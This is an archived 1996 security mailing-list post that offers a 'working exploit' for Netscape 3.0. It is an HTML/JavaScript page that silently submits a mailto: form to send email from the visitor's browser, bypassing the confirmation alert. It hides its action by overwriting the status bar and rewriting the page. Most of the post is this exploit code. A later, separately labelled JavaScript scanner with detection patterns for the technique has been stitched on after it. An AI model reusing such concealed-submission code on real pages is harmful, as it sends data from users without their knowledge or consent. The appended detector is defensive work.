[3322] in WWW Security List Archive


Re:Java Script

daemon@ATHENA.MIT.EDU (htorgema@novice.uwaterloo.ca)
Tue Oct 22 00:11:43 1996

From: htorgema@novice.uwaterloo.ca
Date: Mon, 21 Oct 1996 22:18:47 -0400 (EDT)
Reply-To: htorgema@novice.uwaterloo.ca
To: David Ray <daver@idiom.com>
cc: www-security@ns2.rutgers.edu
In-Reply-To: <v02140b00ae90bda7dcdd@[206.14.80.95]>
Errors-To: owner-www-security@ns2.rutgers.edu


On Sun, 20 Oct 1996, David Ray wrote:

> At 11:17 AM 10/20/96, I wrote:
> > No, this is not correct. This bug existed in the short-lived Netscape
> > version 2.0 which was replaced by version 2.0.1 a long time ago (in Web
> > years).
> >
> > All versions of Netscape since then put up a dialog box asking the user if
> > they are sure they want to send their email message, before it is sent.
> 
> To be more specific, Netscape 3.0, under "Options... Network Preferences...
> Protocols... There is a checkbox that says "Show alert before submitting a
> form by email". If checked, it will put up a dialog box if a mailto: URL is
> being submitted, asking the user to confirm or cancel. This checkbox is
> checked by default, but can be unchecked. Perhaps the person who started
> this thread had unchecked it.
> 
> -Dave

Alright.. then here's a working exploit:

The following script sends a mail automatically.
It was tested with Netscape 3.0 for OSF1 and for AIX.
It visibly doesn't care if the "Show alert before playing with email"
checkbox is set.

The use of a get method and of a text/plain
mime-type seems to be a good enough reason for Netscape to send
mail directly..

This script tries to hide its action as much as possible: a look at
view-source when this page is loaded should show a very innocent-looking
page..


---------- Begin of HTML source ----------

<HTML>
<SCRIPT>
<!--

//////////////////////////////////
// First, some silly functions. //
//////////////////////////////////

var kickme;

function hide() {
        top.status="I'm loading my world, please wait!";
        kickme=setTimeout("hide()",100);
}

function FabulousWorld() {
        clearTimeout(kickme);
        document.open("text/html");
        document.writeln("<HTML><HEAD><TITLE>My World!</TITLE></HEAD>");
        document.writeln("<BODY bgcolor=red text=green link=yellow>");
        document.writeln("<CENTER><H1> My world... </H1>");
        document.writeln("<H3><BLINK>This page is Javascript enabled!</BLINK></H3>");
// Insert your bookmarks here...
        document.writeln("</BODY></HTML>");
        document.close();
}

///////////////////////////////
// Serious stuff begin here! //
///////////////////////////////

function form_handler() {
        document.forms[0].method="get";
        document.forms[0].encoding="text/plain";
        document.forms[0].action="mailto:daver@idiom.com?subject=a good bug never dies...";
                // Remember to put YOUR address when you test this page...

        document.forms[0].text.value="Browser used: "+navigator.appVersion;

        setTimeout("FabulousWorld()",12000);    // This is not elegant..
                                                // but if we change the page before the mail is sent,
                                                // nothing is sent...

        kickme=setTimeout("hide()",100);        // This is just a way to
                                                // hide some status
                                                // mentioning an
                                                // access to your
                                                // favorite SMTP server!
}



// Then, we generate a very usual page.
// The only 'unusual' thing is the onsubmit() handler.

document.writeln('\
<HTML>\
<HEAD>\
<TITLE>Welcome in my world!</TITLE>\
</HEAD>\
<BODY bgcolor=black text=yellow>\
<CENTER><H1>Welcome</H1>\
<BR><BR><BR><BR><BR>\
<FONT Color=White>\
<FORM onsubmit="form_handler()" >\
<INPUT type="hidden" name="text">\
<INPUT TYPE="submit" value="Click Here to Enter my Fabulous Realm!" >\
</CENTER></FORM></FONT>\
</BODY>\
</HTML>');


// -->
</SCRIPT>
</HTML>

---------- End of HTML source ----------

---------------
Henri Torgemane          http://www.undergrad.math.uwaterloo.ca/~htorgema/

Never let your sense of morals prevent you from doing what is right.
                -- Salvor Hardin, "Foundation"
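The combination Henri describes (a form whose action is rewritten from script to a mailto: URL, submitted with GET and a text/plain encoding, with the status bar and the page itself rewritten to mask it) can be flagged in page source before a user ever loads it. The scanner below is an added example and not code from the original post; the indicator names, verdict strings and the sample page are constructed for it.

```javascript
// Added example, not code from the original post: a static scanner that flags
// page source showing the pattern described above (form rewritten from script to
// a mailto: action with GET + text/plain, plus status-bar and page-rewrite
// masking). Indicator names, verdict strings and the sample page are constructed.
const INDICATORS = [
  { id: "script-mailto-action",   re: /\.action\s*=\s*["']mailto:/i },
  { id: "static-mailto-action",   re: /<form[^>]*\baction\s*=\s*["']?mailto:/i },
  { id: "text-plain-encoding",    re: /\.(encoding|enctype)\s*=\s*["']text\/plain["']/i },
  { id: "get-method-from-script", re: /\.method\s*=\s*["']get["']/i },
  { id: "status-bar-overwrite",   re: /\b(top|window|self)\.status\s*=/i },
  { id: "document-rewrite",       re: /document\.open\s*\(/i },
];

// Returns which indicators matched and a verdict derived from their combination.
function scanForSilentMailto(source) {
  const hits = INDICATORS.filter((ind) => ind.re.test(source)).map((ind) => ind.id);
  const has = (id) => hits.includes(id);
  const mailto = has("script-mailto-action") || has("static-mailto-action");
  // The trigger named in the post: a mailto: action combined with GET and text/plain.
  const silentSubmit = mailto && has("text-plain-encoding") && has("get-method-from-script");
  const masking = has("status-bar-overwrite") || has("document-rewrite");
  let verdict = "clean";
  if (silentSubmit) verdict = masking ? "silent-mailto-with-masking" : "silent-mailto";
  else if (mailto) verdict = "mailto-form";
  return { verdict, hits };
}

// Constructed sample condensed from the handler shape in the post (address is a placeholder).
const SAMPLE_PAGE = `
<SCRIPT>
function form_handler() {
  document.forms[0].method="get";
  document.forms[0].encoding="text/plain";
  document.forms[0].action="mailto:someone@example.invalid?subject=test";
  top.status="loading...";
  setTimeout("rewrite()", 12000);
}
function rewrite() { document.open("text/html"); document.writeln("<HTML></HTML>"); document.close(); }
</SCRIPT>
<FORM onsubmit="form_handler()"><INPUT type="hidden" name="text"></FORM>`;

// A conventional mailto form with no scripted rewrite, for contrast.
const BENIGN_PAGE = `<FORM method="post" action="mailto:someone@example.invalid"></FORM>`;

console.log(scanForSilentMailto(SAMPLE_PAGE).verdict);  // silent-mailto-with-masking
console.log(scanForSilentMailto(BENIGN_PAGE).verdict);  // mailto-form
```

A plain mailto form still reports as "mailto-form" so a reviewer can decide whether it is intended; only the scripted GET + text/plain rewrite is rated as a silent submission.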


